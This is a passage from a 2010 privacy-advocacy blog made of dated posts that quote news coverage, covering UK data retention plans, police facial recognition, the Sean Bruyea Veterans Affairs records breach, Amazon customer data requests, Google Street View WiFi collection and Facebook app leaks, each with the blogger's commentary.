Friday, October 29, 2010

U.K. Security Agencies Want Internet Service Providers To Routinely Store ALL User Email And Web Activities For 1 Year (Does This Sound Like Freedom?)


"A massive [U.K.] government database holding details of every phone call, e-mail and time spent on the internet by the public is being planned as part of the fight against crime and terrorism. Internet service providers (ISPs) and telecoms companies would hand over the records to the Home Office under plans put forward by officials"

"The information would be held for at least 12 months and the police and security services would be able to access it..."

"Industry sources gave warning that a single database would be at greater risk of attack and abuse.

Jonathan Bamford, the assistant Information Commissioner, said: “This would give us serious concerns and may well be a step too far. We are not aware of any justification for the State to hold every UK citizen’s phone and internet records. We have real doubts that such a measure can be justified, or is proportionate or desirable. We have warned before that we are sleepwalking into a surveillance society. Holding large collections of data is always risky - the more data that is collected and stored, the bigger the problem when the data is lost, traded or stolen.” "

The Times - ‘Big Brother’ database for phones and e-mails

----

This plan was previously put on hold because of implementation difficulties and resistance. The above article is from 2008. The plan has been brought back... [James]

----

"[Information Commissioner's Office] ICO objects to government data retention plans
Watchdog questions need to store emails and internet history for a year

The government's plans to store UK citizens' emails and internet history have been criticised by the Information Commissioner as going too far.

The Strategic Defence and Security Review, published last week, includes plans to force ISPs, and potentially all companies, to store email and internet data for at least one year." - 26 Oct 2010

V3.co.uk - ICO objects to government data retention plans

----

"A resurrected plan to force internet service providers (ISPs) to store their customers’ personal internet browsing habits has been called “disproportionate” by the Information Commissioner’s Office (ICO).

Despite the coalition government promising to outlaw the retention of internet and email records stored without good reason, the recent Strategic Defence and Security Review said that the former Labour government’s project would be revived.

ISPs and mobile operators already record, and retain for six months, email header information and web access details such as log-on/off times, IP address and details of dial-up numbers. Under the new regulations, this data would be supplemented with web activity logs, currently held for four days, and the complete data set would then be stored for a year."

IT Pro - Official privacy watchdog calls the former Labour plan “disproportionate”

----

"In the July 2009 response, the ICO said that the value communications data has for crime prevention and detection was not justification enough for "mandating" the collection of all possible communications data on subscribers by communications services providers (CSPs)."

publicservice.co.ok - Internet data project has 'privacy risks'

----

"President of the United States (and former General of the Army) Dwight D. Eisenhower used the term in his Farewell Address to the Nation on January 17, 1961:
'A vital element in keeping the peace is our military establishment. Our arms must be mighty, ready for instant action, so that no potential aggressor may be tempted to risk his own destruction...

This conjunction of an immense military establishment and a large arms industry is new in the American experience. The total influence — economic, political, even spiritual — is felt in every city, every statehouse, every office of the federal government. We recognize the imperative need for this development. Yet we must not fail to comprehend its grave implications. Our toil, resources and livelihood are all involved; so is the very structure of our society. In the councils of government, we must guard against the acquisition of unwarranted influence, whether sought or unsought, by the military-industrial complex. The potential for the disastrous rise of misplaced power exists and will persist. We must never let the weight of this combination endanger our liberties or democratic processes. We should take nothing for granted. Only an alert and knowledgeable citizenry can compel the proper meshing of the huge industrial and military machinery of defense with our peaceful methods and goals so that security and liberty may prosper together.'
- Dwight D. Eisenhower

In the penultimate draft of the address, Eisenhower initially used the term military-industrial-congressional complex, and thus indicated the essential role that the United States Congress plays in the propagation of the military industry. But, it is said, that the president chose to strike the word congressional in order to placate members of the legislative branch of the federal government" - Wikipedia


----

It has been said that the "Military Industrial Complex" has been replaced by the "National Security Apparatus".

I will quote "Jonathan Bamford, the assistant Information Commissioner" again "We have warned before that we are sleepwalking into a surveillance society."

"...sleepwalking into a surveillance society."

"...warned..."

"...sleepwalking into a surveillance society."

"...warned..."

"...sleepwalking into a surveillance society."

----

"It is easy to use George Orwell’s 1984 as a comparative reference to where society is at now, but the novel is surely as important as it ever has been.

The modern classic presaged a dystopian society where people were deprived of privacy and, as a ruling body, the Party watched every move citizens made through its Big Brother mechanism.

While Orwell was onto something, however, his prediction (if it indeed was one) of an omnipotent, omniscient, singular controlling body was not exactly spot on.

In today’s Western world the central powers – aka each nation’s government – are not the only ones watching over us, gathering our data and making use of it.

Instead, there are now an abundance of organisations mining personal information to ascertain what people are doing, and even to predict what they will do next.

Given the sheer proliferation of data available over the web and the huge range of sources, companies do not have a particularly arduous task in gathering our information these days.

And whilst in 1984 the Party was the dominant force of one state, Oceania, these companies are global and able to gather people’s data regardless of location.

So, a question: Are we now living in the updated version of the Orwellian Nightmare?"

IT Pro - The Orwellian Nightmare: Version 2.0

----

Picture credit: Shepard Fairey in London: Big Brother Is Watching YOU

Shepard Fairey

http://obeygiant.com/

Thursday, October 28, 2010

"Police Facial Recognition: There's an App for That"


"US cops are employing Apple's iPhone to help identify potential criminals.

The system, known as MORIS (Mobile Offender Recognition and Identification System), lets police officers take a snap of a suspect and upload it to a secure network to be analysed.

If a biometric match is found, the identity, photo and background information of any suspect is transmitted back to the police officer's iPhone reports the Daily Mail newspaper.

Currently being tested by the gang unit at Brockton police in Massachusetts, the iPhone app is expected to be rolled out across 28 police departments and 14 sheriff departments in the state."

PC World - Police Facial Recognition: There's an App for That

----
"With the snap of an iPhone camera, one police department is identifying suspects on the go.

Using an app called MORIS (Mobile Offender Recognition and Identification System), the police department in Brockton, Massachusetts is matching photos of suspects with a database in development by statewide sheriff’s departments.

Sean Mullin, president and CEO of BI2 Technologies of Plymouth who developed the app, explained that the app allows officers to identify suspects through facial recognition, iris biometrics and fingerprints – all on one device.

MORIS may be a quick, easy way to ID perps, but it isn’t cheap. Each iPhone loaded up with the app costs $3,000. These aren’t regular, off-the-shelf iPhones but augmented devices (considerably bulkier than what you’d find in a store and what could easily fit in a pocket) with super-sized batteries as well as some extra hardware.

During the testing phase, police have access to the facial recognition software but the system will later include both iris and fingerprint recognition. Brockton is using a federal grant to pay for the experimental program.

The first devices will be used by the gang unit until more grant money can be obtained to equip the rest of the force. In total, about $150,000 in grant money will be used in 28 police departments and 14 sheriffs departments across the state.

Police Chief William Conlan explained the advantages in a video interview,”This is something that the officers can actually access when they’re out on the road, so they don’t have to bring somebody back here to figure out who they are.”"

Cult of Mac - Police use Facial Recognition iPhone App to ID Perps

----
"New tests conducted by police yet again prove an increasing number of surveillance systems are unreliable.

200 people were enrolled to test CCTV face recognition software on three systems which failed to recognise 8 out of 10 people, even when the system was fed images of people standing still – one of the easiest settings often used to suggest the software is reliable.

The tests were conducted on software produced by Cognitec, Bosch and Cross Match.

The federal police in Germany who conducted the test are citing “bad lighting” as the reason for the failure..."

"Through the use of number plate recognition, cars fitted with mandatory RFID, schools fingerprinting, biometric passports, a European biometric database and ‘Spy Drones’ monitoring street activity, we see not only Big Brother nations emerging but the creation of an entire European Big Brother continent were all movements can be tracked and recorded."


RINF Alternative News - [German] Police Report: Face Recognition CCTV Unreliable

----

I'm torn on this one. I am hip to giving police the ability to check against a database from the scene or from the street. Especially in the uses described in the article - a gang task force. The positive that I do see is police will have less likelihood to haul someone down to the police station in a case of mistaken identity. Especially if dealing with racial differences - the stereotyped "all black people look alike" kind of moment (which applies to characteristic recognition across other racial groups).

(I recall when the movie Colors came out in 1988 and there was some discussion in the media of the role police played in non-white communities. The words used were "white occupational army". This was about the time that police forces all over North America were beginning to look at diversity issues in their ranks)

Where I live we have a large First Nations population. I know a few Indian folks who got hauled in for "further checking" because they had a resemblance to someone the police were looking for. Hopefully an app like this one will help prevent such events from occurring in the future.

On the other hand...

I have some concern about widespread use of this kind of technology on other photo databases. It won't be long before security agencies are using this to comb facebook (if they aren't already) and the web for people they are looking for. I am uncomfortable with the kind of "associative" databases that could be created from that kind of picture crawling.

I have friends who fled Chile and other central and South American countries during the various dictatorships. They told me there were many arrests and interrogations by association. Even just the neighbours of such dangerous people as trade union or human rights activists.

Which means if a coup or authoritarian regime arrives here we will all be among the first to be arrested, tortured and shot (or thrown into the ocean from helicopters). I'm not predicting anything, but hey - what happens if President Palin doesn't like a spanking new NDP/Green coalition government...

And if you don't think bad things can happen here, look at my last post on facial recognition and the G20. Think about the arrests and harassment of Quebec separatists and nationalists during the FLQ crisis. Look at the number of people detained and tortured by the United States during their current conflicts - the number that were detained with no real grounds.

Try this on for size:

"A week after the Justice Department released documents that described in extraordinary detail the CIA's top secret rendition program, an international human rights tribunal has agreed to take up the case of a German citizen who was "rendered" to a CIA black site prison in Afghanistan and tortured in a case of mistaken identity.

The American Civil Liberties Union filed a petition in April with the Inter-American Commission on Human Rights (IAHCR) on behalf of Khaled El-Masri, a truck driver, detained for four months. El-Masri was first detained in December 2003 in Macedonia by law enforcement authorities of that country for 23 days before being turned over to the CIA.

El-Masri was beaten, stripped and drugged prior to being loaded onto a plane bound for Afghanistan, according to the petition. After several interrogation sessions at the black site prison, the CIA realized they had captured the wrong person. In May 2004, the CIA blindfolded El-Masri, put him on a plane and abandoned him on a hillside in Albania. He was never charged with a crime."


Antimedius - International Tribunal Takes Up Rendition, Torture Case

'nuff said on that subject

----

On to another topic, related to facial recognition. How long before we have "body recognition"? And what will happen when people start using a combination of body recognition and facial recognition on all those amateur porn sites where people upload their own pictures? Think Manitoba judges and such for the awesome results of being outed in relation to amateur porn and jilted ex's tossing nudie pics on the internet.

It's a brave new world...

----

Picture credit: Cult of Mac - Police use Facial Recognition iPhone App to ID Perps

Wednesday, October 27, 2010

Sean Bruyea's Battle With Veteran's Affairs Is A Stark Reminder Of Why Privacy Is An Issue For All Of Us

"OTTAWA – An outspoken veterans' advocate and Gulf War vet says the federal government tried to hospitalize him after he began speaking out against government policies."
----
"Bruyea had complained after discovering through Access to Information that his file had been accessed 4,131 times over 10 years by more than 600 department officials."
----
"Sean Bruyea told CTV’s Question Period that two months after he first testified against a controversial change to veterans’ disability payments, Veterans Affairs Canada attempted to discredit him by hospitalizing him and making his advocacy a psychological issue.

“Within two months of that period, they tried to force me to go to their hospital for a psychiatric assessment that they had never asked for before.

Why within two months of my advocacy, did they require that assessment?”Bruyea said.

“You are saying they were trying to hospitalize you?” asked CTV’s Craig Oliver.

“Well, exactly. I was terrified. As an intelligence officer who studied Soviet Russia, I mean I knew about the Gulags in Stalinist Russia, and I thought: 'This isn’t much different. They are trying to make my advocacy a psychological issue'.”

Bruyea said within days of his testimony against lump-sum disability payments, veterans affairs also denied him approval for treatment he had been receiving for his post-traumatic stress disorder, such as meetings with his psychologist and a couple’s therapist.

Privacy Commissioner Jennifer Stoddard found Thursday there had been grave breaches of Bruyea’s personal information at the department and ordered a full audit."

Toronto Sun - Vet alleges government tried to hospitalize him

----
"Until Ms. Stoddart ruled on Oct. 7 that the Veterans Affairs Department violated the Privacy Act by disclosing personal and medical information to bureaucrats and Cabinet ministers who had no right to the files, the government had delayed a legal response to the statement of claim for damages Mr. Bruyea filed last March 2, the court file shows. Normally, a notice of defence to the legal action would have been required at the latest within 30 days, but the government held it off until Sept. 22.

Ms. Stoddart launched her investigation after Mr. Bruyea discovered under the Access to Information Act how widely the department had circulated his medical files as an injured veteran within the department and to former veterans affairs ministers Greg Thompson, a Conservative, and Albina Guarnieri, the previous Liberal veterans affairs minister. Ms. Guarnieri notes Ms. Stoddart referred to the briefing notes she received as "appropriate" because they concerned issues Mr. Bruyea raised.

The privacy commissioner also confirmed Mr. Bruyea's complaint that departmental officials had used his medical condition, post traumatic stress disorder, in an attempt to discredit his work as a veterans advocate opposing a new Veterans Charter. Mr. Bruyea opposed in particular a $275,000 lump-sum cash payment for severely injured veterans, that had been initially brought in under Ms. Guarnieri and implemented by Prime Minister Stephen Harper's (Calgary Southwest, Alta.) government.

Ms. Stoddart said a departmental briefing note to former Conservative veterans minister Greg Thompson in March 2006 contained references to Mr. Bruyea's advocacy activities as well as "considerable sensitive medical information, including diagnosis, symptoms, prognosis, chronology of interactions with the department as a client, amounts of financial benefits received, frequency of appointments and recommended treatment paths." "


The Hill Times Online - Bruyea's lawsuit against feds could be settled out of court, says lawyer

----

And Sean Bruyea's own words:
"As I testified to this committee last month, I was and am the victim of reprisals by Veterans Affairs officials precisely because of my opposition to the New Veterans Charter as well as my support of a veterans’ ombudsman. The New Veterans Charter cannot be looked at in isolation from the process in which it was created. We cannot as a nation or a parliament blindly accept that any means justify the end. The secretive and bullying manner in which the New Veterans Charter was fast tracked prevented due process of Committee review, a review we called for exactly five years ago today and which you are now thankfully carrying out.

Perhaps if Parliament had held public hearings prior to tabling the New Veterans Charter, Veterans Affairs officials such as Darragh Mogan, the chief architect of the NVC, would not have acted with such impunity on March 24 2006 when he told six VAC senior managers including Assistant Deputy Minister Brian Ferguson that it was “time to take the gloves off” when dealing with me and my public analysis of the New Veterans Charter. [bold mine - James]

It is not just a little alarming that the plan detailing what Mr. Mogan carried out with his “gloves off” was sent to two Canadian Forces officers and then later blanked out by Access to Information. It can’t be a coincidence but later that afternoon, Ken Miller circulated a letter to Assistant Deputy Minister Brian Ferguson, Darragh Mogan and others which I wrote to Prime Minister Harper regarding the Charter and which had bold letters written above: “Not for Departmental Viewing.” Thirty-six minutes later, instructions from Assistant Deputy Minister Brian Ferguson that my personal medical files be shared with Parliamentary Secretary Betty Hinton were put into action, just three days after Minister Thompson saw those same files.

I can only assume that this was done to undermine her confidence in me, because her office doesn’t look like a medical office to me and neither Mr. Mogan nor Mr. Ferguson appear to have M.D. or medical doctor designation following their names. More curiously, Parliamentary Secretary Betty Hinton’s support of me quickly declined after receiving the skewed medical information provided by the Department, and I don’t think that’s a fair or ethical use of my personal information. But I may not be alone here; the Privacy Commissioner is investigating the matter.

I wasn’t dreaming when 13,000 pages of Privacy Act information showed me how VAC had used my personal medical files, to slander my reputation with Ministers, Members of Parliament and Senior VAC managers thereby undermining my effectiveness as an advocate for the overhaul of the New Veterans Charter. Nor was I delusional when those same documents showed how VAC bureaucrats – not medical doctors – had determined that I was “clearly unwell”, in need of a “one-week” or more inpatient psychiatric assessment, simply because I demanded a Parliamentary review of the New Veterans Charter. [bold mine - James]

While it is true that I suffer from PTSD and have a therapeutic medical team which strongly opposed the need for this assessment, the mere fact that one disagrees with VAC officials, is not in itself, a diagnosis for such draconian measures or for any other treatment.--- If disagreement with VAC officials were a diagnosis for treatment, many members of this committee would already be racking up rather large therapy bills.

The fact that VAC officials would target an opponent in such a devious way, is precisely why a “Comprehensive Whistleblower Veteran and Family Protection” legislation must be included in any rewrite of the New Veterans Charter to show veterans that they are equal partners in overseeing the programs created in their name and in honour of their sacrifices."

fairwhilstleblower.ca - Sean Bruyea testifies on Veterans Charter (Part 2)

----

Search google news for more on this horror story

Google news search - Sean Bruyea

Google search - Sean Bruyea

Sean Bruyea's website

Media Quote List - Sean Bruyea

----

This is the sort of reprisal that can occur when anyone challenges those with power and authority. It happens when people challenge private corporations and it happens when people challenge politicians/government or its bureaucrats.

It happens in schools - remember my post about the remotely activated webcams on the school issued laptops? The student who received the largest part of the settlement for being spied on remotely by school administration officials was targeted because he was considered a troublemaker for the school administration.

A couple of decades ago I got suddenly paid out by an employer when I started to organise a union in my workplace (I had submitted my resignation effective some 6 months in the future because I was going to university in the fall of that year) prompted by some awful safety violations and tolerance of sexual harassment in the workplace. My co-workers told me that other union friendly people had been fired for contrived reasons in the past in this particular location of the large multi-national I worked for (no, I am not referring to Wal-Mart).

Information is a weapon. People having access to your information can arm them. There are times when people will try to harm you in one way or another. Sean Bruyea is a case in point.

----

Picture Credit: fairwhilstleblower.ca - Sean Bruyea testifies on Veterans Charter (Part 2)

Tuesday, October 26, 2010

North Carolina Tax Dept. Wanted All Names, Purchases, & Titles Of N.C. Amazon Purchasers; Judge Says no way!

"Some clever lawyering turned a routine Internet tax battle into a First Amendment case, as a federal judge in Washington rebuffed North Carolina’s efforts to get its hands on Amazon.com customer data.

Amazon’s lawyers, joined by the American Civil Liberties Union, argued that the North Carolina Department of Revenue threatened the constitutional rights of Amazon customers when it requested the names of North Carolina customers on top of detailed purchase information it had already obtained.

In a 26-page ruling , U.S. District Judge Marsha Pechman found the North Carolina revenooers’ request was too broad and subjected Amazon customers to unconstitutional scrutiny.

As the declarations from the Intervenors make clear, the fear of disclosure of their reading, watching, and listening habits poses an imminent threat of harm and chill to the exercise of First Amendment rights."

Forbes - Federal Judge Quashes N.C. Search For Amazon Customer Data

----

"“The Amazon customers we represent — indeed, anyone who’s purchased books, movies or any other legal thing online — should be able to make purchases freely without the government looking over their shoulder. We hope the court agrees.”

— The court did agree with the ACLU in this case, when U.S. District Judge Marsha Pechman in Washington state ruled yesterday that Amazon.com does not have to turn over the names and addresses of North Carolina residents who made purchases on the website from 2003 to 2010, as requested by that state’s use-tax collectors. Use taxes are collected on, among other things, purchases made online from merchants with no presence in the consumer’s state. CNet reports that Amazon had already provided North Carolina officials with purchases made by ZIP code, but that state officials wanted names and purchases linked together, a request that Pechman said “runs afoul of the First Amendment.” The court did not grant the broader injunction the ACLU, which had intervened in this case, had sought, which would have barred Amazon.com from revealing customer data without a subpoena."

Good Morning Silicon Valley - Quoted: Amazon wins round in privacy fight

----

"North Carolina's Department of Revenue violated the First Amendment in asking Amazon for names of customers who bought books, a Washington judge ruled on Monday.

The ruling is a win for free speech advocates, but the ACLU may continue to pursue the issue because the ruling may not prevent similar requests for broad customer data in the future.

The lawsuit has its roots in a dispute over whether Amazon must pay sales tax on goods shipped to North Carolina residents. As part of its investigations into the issue, North Carolina asked Amazon to send it "all information for all sales" to customers in the state.

Amazon complied by sending specific information, including book titles, about products shipped to North Carolina. The trouble started when North Carolina then asked for the names and addresses of customers. Amazon subsequently asked the court to rule that sending customer names to North Carolina violates the customers' First Amendment rights because the state would then be able to match people's names with specific book titles."

PC World - Court Rules Amazon Doesn't Have to Turn Over Customer Names

----

Once that sort of data is in one set of hands, how long does it take for other agencies to request it?

How long before Amazon purchases are tied into "terrorist" searches and profiling?

How long before such scrutiny wanders into thought police land? Think of the various school districts in the U.S. that have elected boards that censor library and textbook picks.

If you don't believe me, I can provide examples of preemptive enquiries on all variety of activities by police and security agencies all over the world.

As a guy who gets extra searched going through airports because he looks kind of Lebanese in person, especially when I have a tan, I can tell you that profiling and jumping to conclusions is rampant among officialdom. For the record, I am of Ukrainian ethnic descent and my Hutzul genotype has strong central Asian characteristics - my family has been in Canada for over 100 years. But I still get busted for looking like a "foreign" terrorist...

Just sayin'

Look to where information requests can end up sometime in the future. Because by the time you realise it, your freedom will be curtailed - and people really will be watching you.

----

Picture credit: computing.co.uk - Data privacy and the surveillance state

Thursday, October 21, 2010

Google Street View Scanned And Collected Data Streams From WiFi Nodes; Canadian Privacy Commisioner Not Impressed; Google Stops Doing It

"The Canadian government concluded today that Google's collection of fragments of Wi-Fi transmissions violated the law, but also said that the recording was the "result of a careless error" and was not intentional.

Jennifer Stoddart, Canada's privacy commissioner, said she would consider the investigation closed and the matter resolved as long as Google revises its internal procedures to improve "the privacy training it provides all its employees" and deletes or segregates any data relating to Canadian citizens.

In e-mail to CNET, a Google spokesman said the company is working with the privacy commissioner: "As we have said before, we are profoundly sorry for having mistakenly collected payload data from unencrypted networks. As soon as we realized what had happened, we stopped collecting all Wi-Fi data from our Street View cars and immediately informed the authorities."

Stoddart's report sheds a bit more light on what led to the erroneous collection of about 12 Blu-ray discs' worth of Wi-Fi transmissions worldwide. She said that her investigation revealed that an unnamed Google engineer failed to follow company procedures by not sending design specifications for Street View code to the company's legal department for review"

CNET - Canada slaps Google for Street View Wi-Fi intercepts

----
"Google’s roaming Street View cameras have been doing more than snap pics of your neighborhood; they’ve also been collecting packets of information sent over private WiFi networks, the company acknowledged Friday.

The company said the collection was “a mistake,” the result of a programming error, and that it has now stopped collecting the data, according to a post on its blog.

But the revelation raises questions about whether the company violated federal wiretapping laws in collecting the information and could draw scrutiny from U.S. regulators.

Last month, regulators with the Data Protection Authority in Germany asked the search giant what information its Street View cameras collected and what it did with that information."

Wired Magazine - Google Street View Cams Collected Private Content From WiFi Networks

----

"Preliminary Letter of Findings
Complaints under the Personal Information Protection and Electronic Documents Act (the Act)

1. The Office of the Privacy Commissioner of Canada initiated three complaints against Google Inc. (Google) on May 31, 2010, pursuant to subsection 11(2) of the Act, after being made aware that Google Street View cars had been collecting payload data from unencrypted WiFi networks during their collection of publicly broadcast WiFi signals (service set identifiers [SSID] information and Media Access Control (“MAC”) addresses.
2. The three complaints are as follows:
1. Google’s collection, use or disclosure of payload data was done without the individual's prior knowledge and consent;
2. Google’s collection of payload data was done without prior identification of the purposes for which personal information (PI) was collected;
3. Google’s collection of payload data was not limited to that which was necessary for the purposes identified."

Office of the Privacy Commissioner of Canada - Preliminary Letter of Findings; Complaints under the Personal Information Protection and Electronic Documents Act (the Act)


----

"(CNET) -- Google has no plans to resume using its Street View cars to collect information about the location of Wi-Fi networks, a practice that led to a flurry of privacy probes after the company said it unintentionally captured fragments of unencrypted data.

The disclosure appeared in a report on Street View released this week by Canadian privacy commissioner Jennifer Stoddart, who said that "collection is discontinued and Google has no plans to resume it." Assembling an extensive list of the location of Wi-Fi access points can aid in geolocation, especially in areas where connections to cell towers are unreliable.

Instead, Stoddart said that, based on her conversations with headquarters in Mountain View, Ca., "Google intends to obtain the information needed to populate its location-based services database" from "users' handsets."

That, at least, should come as no surprise. As CNET reported in June, mobile phone and laptop users who run certain Google applications already share their location information with the company, which then uses this crowdsourced data to refine its mapping capabilities.

When Google Maps Navigation users requests a location fix with the "use wireless networks" option checked in their settings, their device sends over a list of all nearby addresses associated with wireless hot spots, which can in turn be checked against Google's existing database of those addresses gathered through the Street View project."

CNN - Google ditches Street View Wi-Fi scanning

----

Picture Credit: Wired Magazine - Google Street View Cams Collected Private Content From WiFi Networks

Wednesday, October 20, 2010

"Study: At Age 2, 81 percent of Kids have 'Digital Footprint'"

I was going to put up a picture of a sonogram of a baby, but all the pictures on google images seemed to be someone sharing their child's sonogram with friends and family on personal blogs and it just didn't seem right to me to intrude on their space...

----

"Do you have Facebook friends who share pictures of their babies – from sonograms to their infants’ births, baptisms and other baby-related content? Or those who create an online account for their babies, long before these babies can even see clearly?

These babies clearly have an online presence at a very early age. And it’s not surprising. With people easily using media to share information with others, sharing their babies’ information may sound harmless.

According to a study conducted by Research Now, 92 percent of all American babies have some form of online presence by the time they reach the age of two. It also revealed that children as young as six months have an online presence, including their own e-mail addresses."


Manila Bulletin - Study: At Age 2, 81 percent of Kids have 'Digital Footprint'

----

"Canadian moms seem to have few qualms about the privacy risks of putting family photos on the Internet, according to a new study.

Out of 10 regions surveyed by software maker AVG, Canadian mothers were also the most likely to post scans of their prenatal sonograms online.

The study, which surveyed 2,200 mothers in Canada, the U.S., the U.K., Australia, France, Germany, Italy, Japan, New Zealand and Spain, suggests 81 per cent of today's kids have some kind of online presence before they turn two."


The Daily Gleaner - Canadian moms most likely to upload sonogram online: report

----
"According to a study released last week by AVG, an average of 81 per cent of toddlers in 10 Western countries has a digital presence; 92 per cent in the United States, followed by 91 per cent in New Zealand and 84 per cent in Australia and Canada. A third of children are online at just a few weeks of age, while a quarter appear on the web before they are born in the form of ante-natal scans.

"It's a sobering thought," said AVG managing director Peter Cameron in a statement. "The vast majority of children today have online presence by the time they are two years old -- a presence that will be built on throughout their whole lives.""


Ottawa Citizen - Kids' online presence raises security worries

----

The best advice I have heard on photos and personal information online goes something like this:

It's not going away. Your online footprint will be there forever. Manage it. Make sure that the first thing that comes up is not those embarrassing pictures of you sucking a face mounted Reindeer nose dildo (real story [not me]), or mooning your boss at a Christmas party (real story [not me]), or running naked through a football stadium (real story [not me]). Rand Paul and Aqua Buddha gets no mention here because it wasn't an online photo leak...

You have an online presence whether you like it or not. Ensure the top searches about you are what you want them to be.

"...keep the BlackBerry device at least 0.98 in. (25 mm) from your body (including the abdomen of pregnant women and the lower abdomen of teenagers)"

"To maintain compliance with FCC, IC, MIC, and EU RF exposure guidelines when you carry the BlackBerry device on your body, use only accessories equipped with an integrated belt clip that are supplied or approved by Research In Motion (RIM). Use of accessories that are not expressly approved by RIM might violate FCC, IC, and EU RF exposure guidelines and might void any warranty applicable to the BlackBerry device. If you do not use a bodyworn accessory equipped with an integrated belt clip supplied or approved by RIM when you carry the BlackBerry device, keep the BlackBerry device at least 0.98 in. (25 mm) from your body when the BlackBerry device is transmitting..."

"To reduce radio frequency (RF) exposure consider these safety guidelines: . . . Use hands-free operation if it is available and keep the BlackBerry device at least 0.98 in. (25 mm) from your body (including the abdomen of pregnant women and the lower abdomen of teenagers) when the BlackBerry device is turned on and connected to the wireless network."


Time, Swampland Blog - BlackBerry: Keep Our Phones Away From Your Body

----

Picture Credit: Mobile Phones Reviews - Blackberry 9000 Bold Review

Tuesday, October 19, 2010

Cell Phone Only Households And Poll Result Accuracy


The latest estimates of telephone coverage by the National Center for Health Statistics found that a quarter of U.S. households have only a cell phone and cannot be reached by a landline telephone. Cell-only adults are demographically and politically different from those who live in landline households; as a result, election polls that rely only on landline samples may be biased. Although some survey organizations now include cell phones in their samples, many -- including virtually all of the automated polls -- do not include interviews with people on their cell phones. (For more on the impact of the growing cell-only population on survey research, see "Assessing the Cell Phone Challenge," May 20, 2010).

PewResearchCenter Publications - Cell Phones and Election Polls: An Update

----

Good article. The way that cell phone only households can skew polling reminds me of how Dewey vs Truman turned out. The election was very close. A few thousand votes would have changed the outcome. The polling that was done was biased toward those with telephones. In 1948 only more wealthy people had telephones. Rich people in 1948, just like now, are more likely to vote Republican. In 1948 huge swaths of the United States didn't have telephones. They were poorer and more likely to vote Democrat. They weren't polled, or were polled poorly (polling in areas with few telephones was done by door-knocking in "representative communities" [talk about sample bias issues...])

Nowadays a huge number of young people don't have land lines. I am personally of the opinion that because cranky old white folks make up a larger amount of land lines, U.S. polling results are currently skewed (not enough to save the Democrats, but skewed none-the-less).

"Intentional Sample Bias
Intentional sample bias covers a variety of techniques that pollsters use when they select people for the sample. For an extreme example, some polls (like, I think, Zogby) try to get an equal number of people who self-identify as republicans and democrats. But in most states, the number of party members in the two major parties are not equal. They are, in fact, often pretty dramatically uneven. A less dramatic but still significant one is that many polls do their polling through phone calls, and only call land-lines. Many younger people no longer have land-lines; the exclusion of cell-phone numbers therefore excludes some portion of the population from the sample. These kinds of sample bias produce a significant mismatch between the population of real voters, and the population being sampled."

Scienceblogs.com, Good Math, Bad Math - Margin of Error and Election Polls

----

Top picture credit: Nick Rodrigues - http://www.nickrodrigues.com/art/phoneBooth.html

Truman pic credit: Wikipedia - Associated Press photo by Byron Rollins

Monday, October 18, 2010

"Facebook in Privacy Breach; Top-Ranked Applications Transmit Personal IDs, a Journal Investigation Finds" - Wall Street Journal

"Many of the most popular applications, or "apps," on the social-networking site Facebook Inc. have been transmitting identifying information—in effect, providing access to people's names and, in some cases, their friends' names—to dozens of advertising and Internet tracking companies, a Wall Street Journal investigation has found.

The issue affects tens of millions of Facebook app users, including people who set their profiles to Facebook's strictest privacy settings. The practice breaks Facebook's rules, and renews questions about its ability to keep identifiable information about its users' activities secure.

The problem has ties to the growing field of companies that build detailed databases on people in order to track them online—a practice the Journal has been examining in its What They Know series. It's unclear how long the breach was in place. On Sunday, a Facebook spokesman said it is taking steps to "dramatically limit" the exposure of users' personal information."
Wall Street Journal - Facebook in Privacy Breach; Top-Ranked Applications Transmit Personal IDs, a Journal Investigation Finds

----

Facebook applications have been routinely violating the site's privacy policy, giving marketers access to everything users do online, a Wall Street Journal investigation found.

The investigation found that all 10 of the top 10 applications on the social networking site, including the popular game Farmville with 59 million users, transmit user IDs to outside companies, for marketing purposes. In some cases, the applications also transmitted personal information.
Montreal Gazzette - Investigation pokes holes in Facebook's privacy policy

----

"According to posts on Facebook's developers blog and the blog of one Web firm critiqued in the WSJ piece, Rapleaf, the apps in question are gathering information through a standard Web feature called the "referer URL."

Attentive readers will recall that the same mechanism was blamed in a May WSJ story about privacy issues at Facebook and MySpace. Referers aren't a bad thing by themselves; they're a basic feature of Web links that allows sites to know which sites visitors are coming from.

In most cases, a referer (the misspelling has become common practice) doesn't say anything about who you are -- only which sites you've visited. That's not the case with Facebook profiles, as the company acknowledged in May. But sanitizing referers in a way that works in all browsers is not an easy thing -- see this lengthy explanation from the Facebook engineering blog for the grisly details.

It looks like Facebook's engineers forgot to make sure their referer-laundering works for Facebook apps, too. And, as the WSJ story notes, some companies -- such as Rapleaf -- made further use of this information:

The apps reviewed by the Journal were sending Facebook ID numbers to at least 25 advertising and data firms, several of which build profiles of Internet users by tracking their online activities"
Washington Post - Latest Facebook privacy scare isn't so new

----

referer issues have been around for a long time. Webmasters (like me) have used them forever to watch where people are coming from. I look at referers in the page counter and tracking software i use on this blog you are reading right now. The
difference is that facebook has a whole crapload of other information that goes with their referers to advertisers. Also, when you visit this site (relatively anonymously), you don't allow me to get access to a list of all your friends and their personal information and their photos...

It always aggravated me when my friends would sign up for Mafia Wars or other games and i would know that their sign-up had just given their game developer access to all my photos and posts. I realise it is all public. I constantly tell everyone I know - as soon as it is off a computer or device you tightly control, consider it "in the wild". That being said... I want to control who has access to my images and information. At minimum, I want to be asked or informed that someone has access.

Just 'cause.

----

Picture credit: http://www.fanpop.com/spots/animal-humor/images/7187361/title/want-some-privacy-please-photo

Wednesday, October 13, 2010

British Telecom's Chief Technology Officer Warns Technology Has Reached A Point Where Privacy/Intrusion Has Fundamentally Changed

this photo stolen from http://www.treehugger.com/files/2008/05/servers-data-centers-energy-efficiency-saving-sensors.php
"Privacy ought to be seen as a human right enforced by tighter government regulations and enforcement. European privacy laws are a good starting point in this process but don't by themselves go far enough, according to Schneier.

The chief technology officer at BT Counterpane said that part of the threat to privacy comes from governments hiring private firms to get around privacy regulations. "Data brokers are being re-purposed for government to do data mining that governments themselves wouldn't be allowed to do.""

The Register - Facebook is 'killing privacy for commercial gain'

----

"BT's chief security technology officer has accused the chief executives of big name tech companies such as Google and Facebook of "deliberately killing privacy" in their quest to boost profits.

Bruce Schneier branded Facebook the "worst offender", alleging that the site deliberately eroded privacy in order to successfully pursue its business model.

"We're not Facebook customers, we're Facebook's product it sells to its customers [the advertisers]," he said. "Facebook wants more users because it's in the business of advertising.""


V3 - Bruce Schneier slams Facebook for deliberately eroding privacy

----
"The difference now, he said, was that the falling cost of storage and processing power made it far easier to keep data such as e-mail conversations, Tweets or postings to a social network page than it was to spend the time managing and deleting the information.
